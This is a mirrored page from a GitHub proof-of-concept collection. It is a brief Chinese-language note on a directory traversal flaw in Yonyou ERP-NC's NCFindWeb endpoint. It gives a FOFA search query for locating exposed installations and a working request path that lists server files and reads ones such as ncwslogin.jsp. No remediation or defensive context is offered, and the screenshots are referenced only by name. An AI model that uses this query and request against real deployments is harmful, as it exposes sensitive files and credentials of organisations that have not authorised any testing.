admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 20:06:03 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/OA产品漏洞/用友 ERP-NC NCFindWeb 目录遍历漏洞.md
Threekiii 8b4e8ec87c OA产品漏洞
2022-02-21 09:35:01 +08:00

533 B
Raw Blame History

用友 ERP-NC NCFindWeb 目录遍历漏洞

漏洞描述

用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息

漏洞影响

用友ERP-NC

FOFA

app="用友-UFIDA-NC"

漏洞复现

POC为

/NCFindWeb?service=IPreAlertConfigService&filename=

yongyou-8-1

查看 ncwslogin.jsp 文件

yongyou-8-2